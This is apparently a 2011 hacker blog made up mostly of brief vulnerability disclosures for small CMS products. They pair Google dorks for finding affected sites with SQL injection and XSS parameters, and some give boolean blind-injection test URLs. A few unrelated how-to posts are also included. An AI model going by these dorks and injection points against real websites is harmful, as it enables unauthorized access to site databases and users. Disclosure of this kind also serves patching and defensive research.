Sunday, February 27, 2011

DOERS CMS Multiple Vulnerabilities


Title : DOERS CMS Multiple Vulnerabilities
Web : http://www.doers.in/
Found By: p0pc0rn 28/02/2011
Dork : intext:" powered by DOERS" asp

SQL
---

http://site.com/xxxx.asp?id=[SQL]
http://site.com/xxxx.asp?category=[SQL]
and more..

XSS
---
Parameter can be xss'ed

currentPage=[XSS]
categoryname=[XSS]
page=[XSS]
cate=[XSS]
sub=[XSS]
and more..

POC
---


http://www.1337day.com/exploits/15522

thanks,
-p0pc0rn-
Share:

Saturday, February 26, 2011

Site Designed by Hypersoft Solutions is Vulnerable to SQL Injection


Title : Site Designed by Hypersoft Solutions is Vulnerable to SQL Injection
Web : http://www.hypersoftsolutions.com/
Found by: p0pc0rn 26/02/2011
Filetype: asp
Dork
: intext:"By: HypersoftSolutions.Com"
: inurl :"cms.asp?LinkId="


SQL
---
http://site.com/cms.asp?LinkId=[SQL]
http://site.com/cms.asp?CatId=[SQL]

POC
---
http://site.com/cms.asp?LinkId=1 and 1=1 TRUE
http://site.com/cms.asp?LinkId=1 and 1=0 FALSE


http://www.1337day.com/exploits/15514

thanks,
-p0pc0rn-
Share:

WebContent CMS Vulnerable to Multiple SQL Injection


Title : WebContent CMS Vulnerable to Multiple SQL Injection
Web : http://www.interbase.com.my/
Found by: p0pc0rn 26/02/2011
Dork
: intext:"Powered By Interbase WebContent"
: inurl:"cms/layout/Printer.asp?ProductID="
: intext:"Powered By WebContent"


SQL - Microsoft JET Database Engine
------------------------------------

http://site.com/cms/AllProduct.asp?CatID=[SQL]
http://site.com/cms/layout/Printer.asp?ProductID=[SQL]
http://site.com/cms/General.asp?ProductID=[SQL]



http://www.1337day.com/exploits/15513

thanks,
-p0pc0rn-
Share:

How to Protect Your Facebook Account From Being a Victim to MiTM Attacker by Activate HTTPS

How to Protect Your Facebook Account From Being a Victim to MiTM Attacker by Activate HTTPS


1 - Login to your facebook account.

2 - Go to Account > Account Settings

3 - Scroll down and at the Account security line, click change

4 - Tick all boxes.Recommended.

5 - Save and done! Your facebook now will be in Https mode.



Addition


At the same line also(Account security) you can check from where your facebook been logged before.
Share:

Friday, February 25, 2011

PhUse™ CMS Vulnerable to Non Persistent XSS


Title : PhUse™ CMS Vulnerable to Non Persistent XSS
Web : http://www.phusecms.com : http://www.phusecms.co.uk
Found by: p0pc0rn 25/02/2011
Dork : intext:"Powered by PhUse™" : filetype:phuse "searchresults"

XSS
---
http://site.com/searchresults.phuse?q=[XSS]

POC
---



thanks.
-p0pc0rn-
Share:

RaksoCT Web Design Vulnerable to Multiples SQL Injection

Title : RaksoCT Web Design Vulnerable to Multiples SQL Injection
Web : http://raksoct.com/
Found By: p0pc0rn 25/02/2011


Blind SQL
----------
1 - Parameter gallery_details.asp?a_id=[Blind SQL]

POC
---
http://site.com//gallery_details.asp?a_id=12' and '1'='1 TRUE
http://site.com//gallery_details.asp?a_id=12' and '0'='1 FALSE


2 - Parameter news.asp?intSeq=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?intSeq=69' and '1'='1 TRUE
http://www.site.com/news/news.asp?intSeq=69' and '0'='1 FALSE



3 - Parameter news.asp?id=[Blind SQL]

POC
---
http://www.site.com/news/news.asp?id=256 and 1=1 TRUE
http://www.site.com/news/news.asp?id=256 and 1=0 FALSE





http://www.exploit-db.com/exploits/16241/

Thanks
-p0pc0rn-
Share:

Thursday, February 24, 2011

JuiceAPac CMS Multiple Vulnerabilities

Title    : Multiple Vulnerabilities in JuiceAPac CMS
Found by: p0pc0rn 24/02/2011
Web     : http://www.juiceapac.com
Dork     : intext:"Powered by JuiceAPac" filetype:cfm

SQL
---

http://site.com/xxxx.cfm?xxx=[SQL]


XSS
---

http://site.com/search.cfm
POST: THE_KEYWORDS=[XSS]&year=[XSS]

http://site.com/news.cfm?NewsID=[XSS]
//maybe other parameter can be xss'ed too.


POC
---

http://www.1337day.com/exploits/15499

thanks
-p0pc0rn-
Share:

Wednesday, February 23, 2011

SQL and XSS in DIY Web CMS

SQL and XSS in DIY Web CMS

found by : p0pc0rn 22/2/2011
web : http://www.mydiyweb.com.my
dork : intext:"powered by DiyWeb"

SQL - Microsoft JET Database Engine error
-----------------------------------------

http://site.com/template.asp?menuid=[SQL]
http://site.com/viewcatalog.asp?id=[SQL]
http://site.com/xxx.asp?id=[SQL]

XSS
---
http://site.com/diyweb/login.asp?msg=[XSS] -- login page



http://www.exploit-db.com/exploits/16205/

thanks
-p0pc0rn-
Share:

Monday, February 14, 2011

CMS Powered by sen9.com Multiple Vulnerabilities

CMS Powered by sen9.com Multiple Vulnerabilities

SQL

http://site.com/productDetail.php?P_Id=[sql]
http://site.com/subPage.php?SP_Id=[sql]
http://site.com/videoDetail.php?V_Id=[sql]
http://site.com/journal.php?J_Id=[sql]



screenshot:

XSS

http://site.com/x.php?V_Name=[xss]&SE_Name=[xss]




Directory Listing


there are more vuln found.
I just highlight the high risk vuln

status:reported

thanks
-p0pc0rn-
Share:

Thursday, February 10, 2011

How to Enable Telnet in Windows 7

1 - Start > Control Panel

2 - Click Programs


3 - At the "Programs and Features", click “Turn Windows features on or off


4 - New box will pop up..scroll down to find "Telnet Client"..tick and OK! DONE!


alternatively

using cmd prompt

start / w pkgmgr /iu:"TelnetClient"
Share:

Monday, February 7, 2011

How to Play Snake in Youtube for fun!

How to Play Snake in Youtube

1 - Go to youtube.com

2 - Find any video

3 - Scroll the timeline to 0:00 and click pause

4 - Hold left arrow button on your keyboard for a while...then push up arrow button..

5 - The snake will appear and u are on game! :D

Share: